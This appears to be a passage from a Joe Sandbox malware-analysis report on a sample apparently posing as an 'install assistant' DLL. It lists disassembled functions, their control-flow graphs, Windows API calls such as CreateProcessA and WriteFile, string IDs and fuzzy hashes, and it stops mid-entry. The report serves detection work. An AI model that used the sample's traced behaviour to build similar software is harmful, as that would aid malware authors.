6c9349c7 6989->6993 6990->6953 6996 6c9348e7-6c9348fb 6993->6996 6997 6c9348b5-6c9348e1 GetLastError call 6c91ff62 call 6c931c8f 6993->6997 6996->6990 6997->6996
                              APIs
                                • Part of subcall function 6C9349C7: CreateFileW.KERNEL32(00000000,00000000,?,6C934685,?,?,00000000,?,6C934685,00000000,0000000C), ref: 6C9349E4
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9346F0
                              • __dosmaperr.LIBCMT ref: 6C9346F7
                              • GetFileType.KERNEL32(00000000), ref: 6C934703
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C93470D
                              • __dosmaperr.LIBCMT ref: 6C934716
                              • CloseHandle.KERNEL32(00000000), ref: 6C934736
                              • CloseHandle.KERNEL32(6C92B640), ref: 6C934883
                              • GetLastError.KERNEL32 ref: 6C9348B5
                              • __dosmaperr.LIBCMT ref: 6C9348BC
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: 8Q
                              • API String ID: 4237864984-4022487301
                              • Opcode ID: c2a046b8085480dddf6832589157001ed0c0336afabdedc4847d7a446ea487c6
                              • Instruction ID: dd96bf7d24f9994cb4713e8980866f87335d56811d63777c84eedff39bbe2224
                              • Opcode Fuzzy Hash: c2a046b8085480dddf6832589157001ed0c0336afabdedc4847d7a446ea487c6
                              • Instruction Fuzzy Hash: A0A14632A082698FCF099F68C8517ED7FB5AB07328F195259E815AF790CB36C816CF51
                              Function 6C8EC750 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 183COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7002 6c8ec750-6c8ec7a9 call 6c9170e0 7005 6c8ec7d0-6c8ec7d9 7002->7005 7006 6c8ec7db-6c8ec7e0 7005->7006 7007 6c8ec820-6c8ec825 7005->7007 7008 6c8ec7e2-6c8ec7e7 7006->7008 7009 6c8ec860-6c8ec865 7006->7009 7010 6c8ec827-6c8ec82c 7007->7010 7011 6c8ec8a0-6c8ec8a5 7007->7011 7014 6c8ec7ed-6c8ec7f2 7008->7014 7015 6c8ec8e2-6c8ec94f WriteFile 7008->7015 7018 6c8ec86b-6c8ec870 7009->7018 7019 6c8ec9a1-6c8ec9b8 WriteFile 7009->7019 7016 6c8ec977-6c8ec98b 7010->7016 7017 6c8ec832-6c8ec837 7010->7017 7012 6c8ec8ab-6c8ec8b0 7011->7012 7013 6c8ec9f9-6c8eca29 call 6c91b910 7011->7013 7021 6c8eca2e-6c8eca33 7012->7021 7022 6c8ec8b6-6c8ec8dd 7012->7022 7013->7005 7023 6c8ec7f8-6c8ec7fd 7014->7023 7024 6c8ec959-6c8ec96d WriteFile 7014->7024 7015->7024 7025 6c8ec98f-6c8ec99c 7016->7025 7026 6c8ec83d-6c8ec842 7017->7026 7027 6c8ec7ab-6c8ec7c0 7017->7027 7028 6c8ec876-6c8ec87b 7018->7028 7029 6c8ec9c2-6c8ec9ef call 6c91be90 ReadFile 7018->7029 7019->7029 7021->7005 7033 6c8eca39-6c8eca47 7021->7033 7031 6c8ec7c3-6c8ec7c8 7022->7031 7023->7005 7034 6c8ec7ff-6c8ec81a 7023->7034 7024->7016 7025->7005 7026->7005 7035 6c8ec844-6c8ec857 7026->7035 7027->7031 7028->7005 7030 6c8ec881-6c8ec89b 7028->7030 7029->7013 7030->7025 7031->7005 7034->7031 7035->7031
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: :uW$;uW$;uW$> 4!$> 4!
                              • API String ID: 0-4100612575
                              • Opcode ID: de7a011bfa97b266678fae0ab153854e49b857d5c13875a5766593a9b4cf0a97
                              • Instruction ID: 120804882fafef8a18ba79b46e25bb20403a8a3ce49f4dfa729ffdc3bcd6b54f
                              • Opcode Fuzzy Hash: de7a011bfa97b266678fae0ab153854e49b857d5c13875a5766593a9b4cf0a97
                              • Instruction Fuzzy Hash: 97714CB0608345AFD720DF19C980B5ABBF5BF8E708F104D2EF495D6A52D771D8488B92
                              Function 6C8EBCA0 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 605COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: K?Jo$K?Jo$`Rlx$7eO
                              • API String ID: 0-174837320
                              • Opcode ID: 07f7fc4445188678bca3e81401079bea4991489627b919dbd9ac4bc40f02dd94
                              • Instruction ID: 87119b2d08f7507dcb33feebba84158d4721555031712722f30e80244b08013c
                              • Opcode Fuzzy Hash: 07f7fc4445188678bca3e81401079bea4991489627b919dbd9ac4bc40f02dd94
                              • Instruction Fuzzy Hash: 7A427674A093468FC724DF18C18062ABBE1AF8A319F248D5EF5A58BB21D738D845CB57
                              Function 6C794200 Relevance: 9.0, APIs: 3, Strings: 1, Instructions: 2005COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;T55
                              • API String ID: 0-2572755013
                              • Opcode ID: c3581901a74c15f0834d4b7267d718c521a8b911adbc42cd73f2b1d82d046bd8
                              • Instruction ID: 1fced8819807b6766a3881d63bc6517c57125ade46401936de7cb112ac20fddd
                              • Opcode Fuzzy Hash: c3581901a74c15f0834d4b7267d718c521a8b911adbc42cd73f2b1d82d046bd8
                              • Instruction Fuzzy Hash: 3E03E071645B018FC728CF28C9D0696B7E3AFD5328719CB7DC0AA4BA95DB34B44ACB40
                              Function 6C915560 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7579 6c915560-6c9155e7 CreateProcessA 7580 6c91563a-6c915643 7579->7580 7581 6c915660-6c91567b 7580->7581 7582 6c915645-6c91564a 7580->7582 7581->7580 7583 6c9155f0-6c915632 WaitForSingleObject CloseHandle * 2 7582->7583 7584 6c91564c-6c915651 7582->7584 7583->7580 7584->7580 7585 6c915653-6c915688 7584->7585
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID: D
                              • API String ID: 963392458-2746444292
                              • Opcode ID: 82113b60b24b9c51f2a31c1585138b7f1d2b61c41c9d4d8a9ba3184dc9475ac7
                              • Instruction ID: 79cc591382274901f7e02e89c9415c76134d314fce30f32a99710b48f7d508cb
                              • Opcode Fuzzy Hash: 82113b60b24b9c51f2a31c1585138b7f1d2b61c41c9d4d8a9ba3184dc9475ac7
                              • Instruction Fuzzy Hash: 773102B09093408FD340DF29C19971EBBF0AB9A358F419A1DF4D986650E7B4D5898F43
                              Function 6C92C1CE Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7587 6c92c1ce-6c92c1ea 7588 6c92c1f0-6c92c1f2 7587->7588 7589 6c92c3a9 7587->7589 7590 6c92c214-6c92c235 7588->7590 7591 6c92c1f4-6c92c207 call 6c91ff4f call 6c91ff3c call 6c920690 7588->7591 7592 6c92c3ab-6c92c3af 7589->7592 7594 6c92c237-6c92c23a 7590->7594 7595 6c92c23c-6c92c242 7590->7595 7609 6c92c20c-6c92c20f 7591->7609 7594->7595 7596 6c92c244-6c92c249 7594->7596 7595->7591 7595->7596 7598 6c92c25a-6c92c26b call 6c92c3b0 7596->7598 7599 6c92c24b-6c92c257 call 6c92b1d9 7596->7599 7607 6c92c2ac-6c92c2be 7598->7607 7608 6c92c26d-6c92c26f 7598->7608 7599->7598 7610 6c92c2c0-6c92c2c9 7607->7610 7611 6c92c305-6c92c327 WriteFile 7607->7611 7612 6c92c271-6c92c279 7608->7612 7613 6c92c296-6c92c2a2 call 6c92c421 7608->7613 7609->7592 7614 6c92c2f5-6c92c303 call 6c92c833 7610->7614 7615 6c92c2cb-6c92c2ce 7610->7615 7618 6c92c332 7611->7618 7619 6c92c329-6c92c32f GetLastError 7611->7619 7616 6c92c33b-6c92c33e 7612->7616 7617 6c92c27f-6c92c28c call 6c92c7cb 7612->7617 7627 6c92c2a7-6c92c2aa 7613->7627 7614->7627 7623 6c92c2d0-6c92c2d3 7615->7623 7624 6c92c2e5-6c92c2f3 call 6c92c9f7 7615->7624 7622 6c92c341-6c92c346 7616->7622 7628 6c92c28f-6c92c291 7617->7628 7621 6c92c335-6c92c33a 7618->7621 7619->7618 7621->7616 7629 6c92c3a4-6c92c3a7 7622->7629 7630 6c92c348-6c92c34d 7622->7630 7623->7622 7631 6c92c2d5-6c92c2e3 call 6c92c90e 7623->7631 7624->7627 7627->7628 7628->7621 7629->7592 7635 6c92c379-6c92c385 7630->7635 7636 6c92c34f-6c92c354 7630->7636 7631->7627 7642 6c92c387-6c92c38a 7635->7642 7643 6c92c38c-6c92c39f call 6c91ff3c call 6c91ff4f 7635->7643 7639 6c92c356-6c92c368 call 6c91ff3c call 6c91ff4f 7636->7639 7640 6c92c36d-6c92c374 call 6c91ff62 7636->7640 7639->7609 7640->7609 7642->7589 7642->7643 7643->7609
                              APIs
                                • Part of subcall function 6C92C421: GetConsoleCP.KERNEL32(?,6C92B640,?), ref: 6C92C469
                              • WriteFile.KERNEL32(?,?,6C934C5C,00000000,00000000,?,00000000,00000000,6C936026,00000000,00000000,?,00000000,6C92B640,6C934C5C,00000000), ref: 6C92C31F
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C934C5C,6C92B640,00000000,?,?,?,?,00000000,?), ref: 6C92C329
                              • __dosmaperr.LIBCMT ref: 6C92C36E
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                              • String ID: 8Q
                              • API String ID: 251514795-4022487301
                              • Opcode ID: 463db2052c5bfd28d74404b8bb438ca82ca2e77f41d0733da94e1ffc8517769e
                              • Instruction ID: 58ec94ed5ca29b0873e60fe3db96b3c9072c58dc96f711e896ec1c53395f59d0
                              • Opcode Fuzzy Hash: 463db2052c5bfd28d74404b8bb438ca82ca2e77f41d0733da94e1ffc8517769e
                              • Instruction Fuzzy Hash: 3D51E271A2520EAAFB00AFE4C841BEEBBB9FF1A318F100511E490A7A44D779D9058760
                              Function 6C916100 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 142COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7654 6c916100-6c91610c 7655 6c91614d 7654->7655 7656 6c91610e-6c916119 7654->7656 7657 6c91614f-6c9161c7 7655->7657 7658 6c91611b-6c91612d 7656->7658 7659 6c91612f-6c91613c call 6c7e01f0 call 6c921088 7656->7659 7661 6c9161f3-6c9161f9 7657->7661 7662 6c9161c9-6c9161f1 7657->7662 7658->7659 7667 6c916141-6c91614b 7659->7667 7662->7661 7664 6c9161fa-6c9162b9 call 6c7e2250 call 6c7e2340 call 6c9198e9 call 6c7de010 call 6c9175f8 7662->7664 7667->7657
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9162A1
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 323602529-1866435925
                              • Opcode ID: a2188b052461a2128a0b96dca3b3a31880e42dd5a5fdd36bf4ae4da3e518d3d2
                              • Instruction ID: 8d15195269ddfbb9b7f801f9efc5198e6d9ebdba9da1a07224ca943b137baeba
                              • Opcode Fuzzy Hash: a2188b052461a2128a0b96dca3b3a31880e42dd5a5fdd36bf4ae4da3e518d3d2
                              • Instruction Fuzzy Hash: 9B5142B5900B408FD725CF29C596B96BBF1FB58318F008A2DD8868BB91D775F909CB90
                              Function 6C92BE95 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7699 6c92be95-6c92bea9 call 6c931b12 7702 6c92beab-6c92bead 7699->7702 7703 6c92beaf-6c92beb7 7699->7703 7704 6c92befd-6c92bf1d call 6c931c8f 7702->7704 7705 6c92bec2-6c92bec5 7703->7705 7706 6c92beb9-6c92bec0 7703->7706 7716 6c92bf2b 7704->7716 7717 6c92bf1f-6c92bf29 call 6c91ff62 7704->7717 7709 6c92bee3-6c92bef3 call 6c931b12 CloseHandle 7705->7709 7710 6c92bec7-6c92becb 7705->7710 7706->7705 7708 6c92becd-6c92bee1 call 6c931b12 * 2 7706->7708 7708->7702 7708->7709 7709->7702 7719 6c92bef5-6c92befb GetLastError 7709->7719 7710->7708 7710->7709 7721 6c92bf2d-6c92bf30 7716->7721 7717->7721 7719->7704
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6C9347CF), ref: 6C92BEEB
                              • GetLastError.KERNEL32(?,00000000,?,6C9347CF), ref: 6C92BEF5
                              • __dosmaperr.LIBCMT ref: 6C92BF20
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID:
                              • API String ID: 2583163307-0
                              • Opcode ID: 351e704abaa1bbc8a490b67d5fb42c0558803d22dbb52e94db847d809f72c799
                              • Instruction ID: 4e05c4068c12de0009e0707a4acdccee93cb5c716adbf720aa0f594ef1010e93
                              • Opcode Fuzzy Hash: 351e704abaa1bbc8a490b67d5fb42c0558803d22dbb52e94db847d809f72c799
                              • Instruction Fuzzy Hash: 5C018E3371812006C31516399444BAD37FD4F9773CF3A4359EA9A87ED5DF68C84441D0
                              Function 6C92110C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7944 6c92110c-6c921117 7945 6c921119-6c92112c call 6c91ff3c call 6c920690 7944->7945 7946 6c92112e-6c92113b 7944->7946 7957 6c921180-6c921182 7945->7957 7948 6c921176-6c92117f call 6c92b3e5 7946->7948 7949 6c92113d-6c921152 call 6c921229 call 6c928cae call 6c92a1d0 call 6c92be08 7946->7949 7948->7957 7963 6c921157-6c92115c 7949->7963 7964 6c921163-6c921167 7963->7964 7965 6c92115e-6c921161 7963->7965 7964->7948 7966 6c921169-6c921175 call 6c924d2b 7964->7966 7965->7948 7966->7948
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction ID: fe54a227640389dcbe75b63b990a22dc2d324a13c0ac8b1657347b1b5b5825ae
                              • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction Fuzzy Hash: 50F0D6325226141BD7211A399C00BCA32A88F6337CF114715E4E492FC9CB7DD91AC6D1
                              Function 6C915ED0 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                              Download Yara Rule
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C916024
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C916064
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID:
                              • API String ID: 323602529-0
                              • Opcode ID: e83293587d1bba100bd6976ea059bf075730bf541328241382b95534f12cba7a
                              • Instruction ID: d0c6431159d93ef14d27b8fc31b155026a039a937e688f75c9cb9e167e0b2b69
                              • Opcode Fuzzy Hash: e83293587d1bba100bd6976ea059bf075730bf541328241382b95534f12cba7a
                              • Instruction Fuzzy Hash: 59513771505B04DBD725CF25C989BE6BBF4BB04714F448A1CE4AA8BB91DB30F549CB81
                              Function 6C91F4AF Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(6C946DF0,0000000C), ref: 6C91F4C2
                              • ExitThread.KERNEL32 ref: 6C91F4C9
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ErrorExitLastThread
                              • String ID:
                              • API String ID: 1611280651-0
                              • Opcode ID: 52f770de5cc95f8d9af4ce2ca38357278edd83196b79ca792264582acd36cc9a
                              • Instruction ID: 9c308489fa51c7aeef5593705d7928ea51a4df5ea0670f719c5d812c2fe1658a
                              • Opcode Fuzzy Hash: 52f770de5cc95f8d9af4ce2ca38357278edd83196b79ca792264582acd36cc9a
                              • Instruction Fuzzy Hash: 47F0C271A182099FDB04AFB1C40AAAE3B74FF61319F248549F11697B91CF38D905DF61
                              Function 6C92B4E2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              • Opcode ID: db54ec78f5d6ccec81b7709326d0c8ba445ffc9b583be83b2ba47437a73a664d
                              • Instruction ID: e5b8db04ee3620e2e7652d79ebca18c0797f12a695519f7fcef5ac22bb8c524d
                              • Opcode Fuzzy Hash: db54ec78f5d6ccec81b7709326d0c8ba445ffc9b583be83b2ba47437a73a664d
                              • Instruction Fuzzy Hash: 74113671A0420AAFCF05CF59E941EDB7BF8EF48318F154069F809AB341D671E915CBA4
                              Function 6C93456E Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction ID: c3a592659b17d6092419bbf409c34df64d36ab6ba0ecadf0a3d5c7f6108a09f8
